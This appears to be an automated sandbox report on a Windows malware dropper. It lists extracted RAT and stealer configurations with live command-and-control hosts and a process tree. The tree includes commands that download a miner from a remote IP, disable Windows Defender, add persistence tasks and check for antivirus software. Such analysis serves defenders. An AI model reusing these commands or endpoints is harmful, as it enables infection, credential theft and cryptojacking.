Analysis

  • max time kernel
    570s
  • max time network
    906s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-01-2025 19:31

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

6.tcp.eu.ngrok.io:12925

Mutex

hDtjdONRXVCh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Helper Atanka

C2

193.203.238.136:8080

Mutex

14f39659-ca5b-4af7-8045-bed3500c385f

Attributes
  • encryption_key

    11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424

  • install_name

    diskutil.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    diskutil

  • subdirectory

    diskutil

Extracted

Family

xworm

C2

45.141.26.134:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

darkvision

C2

acuweld.ddns.net

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Detect Vidar Stealer 9 IoCs
  • Detect Xworm Payload 3 IoCs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 6 IoCs
  • RunningRat

    RunningRat is a remote access trojan first seen in 2018.

  • RunningRat payload 2 IoCs
  • Runningrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • XMRig Miner payload 20 IoCs
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 3 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 28 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 7 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 25 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 13 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3720
    • C:\Users\Admin\AppData\Local\Temp\a\win.exe
      "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:4032
    • C:\Users\Admin\AppData\Local\Temp\a\Office%202010%20Toolkit.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Office%202010%20Toolkit.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2616
    • C:\Users\Admin\AppData\Local\Temp\a\Coc%20Coc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Coc%20Coc.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1244
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\500A.tmp\500B.tmp\500C.bat C:\Users\Admin\AppData\Local\Temp\a\Coc%20Coc.exe"
        3⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:3176
        • C:\Users\Admin\AppData\Roaming\portable_util.exe
          portable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Users\Admin\AppData\Roaming\setup.exe
            "C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3932
            • C:\Users\Admin\AppData\Roaming\setup.exe
              C:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x318,0x31c,0x320,0x2f4,0x324,0xf28088,0xf28098,0xf280a4
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4012
    • C:\Users\Admin\AppData\Local\Temp\a\winvnc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\winvnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:1760
    • C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe
      "C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3788
      • C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe
        "C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe" -burn.unelevated BurnPipe.{6C26125F-6DA7-49EA-811B-3A4786E6A902} {EB6EFEE2-F24D-4C32-B9B4-2BE8B356FDDC} 3788
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2248
    • C:\Users\Admin\AppData\Local\Temp\a\Google%20Chrome.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Google%20Chrome.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3628
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7332.tmp\7333.tmp\7344.bat C:\Users\Admin\AppData\Local\Temp\a\Google%20Chrome.exe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" hoiquannet.com/301
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2016
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf4,0x128,0x7ffa5a3ccc40,0x7ffa5a3ccc4c,0x7ffa5a3ccc58
            5⤵
              PID:1268
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
              5⤵
                PID:2920
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1996,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:3
                5⤵
                  PID:1696
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:8
                  5⤵
                    PID:2296
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1
                    5⤵
                      PID:1152
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
                      5⤵
                        PID:4880
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3796,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3696 /prefetch:1
                        5⤵
                          PID:3536
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3380,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:1
                          5⤵
                            PID:4404
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4448,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:1
                            5⤵
                              PID:728
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4644,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:1
                              5⤵
                                PID:4020
                        • C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2416
                        • C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe"
                          2⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          PID:4880
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2488
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3896
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1308
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                              4⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2416
                          • C:\WinXRAR\xmrig.exe
                            C:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/0
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:444
                        • C:\Users\Admin\AppData\Local\Temp\a\.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\.exe"
                          2⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:804
                        • C:\Users\Admin\AppData\Local\Temp\a\diskutil.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\diskutil.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1784
                          • C:\Windows\SYSTEM32\schtasks.exe
                            "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:2384
                          • C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe
                            "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: GetForegroundWindowSpam
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:3200
                            • C:\Windows\SYSTEM32\schtasks.exe
                              "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4496
                        • C:\Users\Admin\AppData\Local\Temp\a\systempreter.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\systempreter.exe"
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:884
                        • C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4504
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\16PP890HDJM7" & exit
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4564
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 10
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:3892
                        • C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3432
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\JECTJECTRI58" & exit
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2572
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 10
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:5096
                        • C:\Users\Admin\AppData\Local\Temp\a\DuckMatter.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\DuckMatter.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:1488
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c move Camcorders Camcorders.cmd & Camcorders.cmd
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3112
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              4⤵
                              • Enumerates processes with tasklist
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2276
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /I "opssvc wrsa"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2896
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              4⤵
                              • Enumerates processes with tasklist
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5020
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1308
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c md 121759
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3668
                            • C:\Windows\SysWOW64\extrac32.exe
                              extrac32 /Y /E Including
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4888
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /V "Contracts" Food
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1428
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c copy /b ..\Dial + ..\Reaction + ..\Rw + ..\More C
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4540
                            • C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com
                              Conditioning.com C
                              4⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Checks processor information in registry
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:3860
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com" & rd /s /q "C:\ProgramData\K6XB16XBA1NY" & exit
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4164
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 10
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  • Delays execution with timeout.exe
                                  PID:4756
                            • C:\Windows\SysWOW64\choice.exe
                              choice /d y /t 5
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3264
                        • C:\Users\Admin\AppData\Local\Temp\a\microsoft-onedrive.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\microsoft-onedrive.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2744
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1900
                          • C:\Users\Admin\AppData\Local\Temp\Built.exe
                            "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:3704
                            • C:\Users\Admin\AppData\Local\Temp\Built.exe
                              "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2560
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
                                5⤵
                                  PID:2668
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    PID:3208
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  5⤵
                                    PID:3956
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:396
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    5⤵
                                      PID:4564
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        6⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4156
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      5⤵
                                        PID:4804
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          6⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:644
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                        5⤵
                                          PID:1492
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                            6⤵
                                              PID:2044
                                          • C:\Windows\system32\cmd.exe
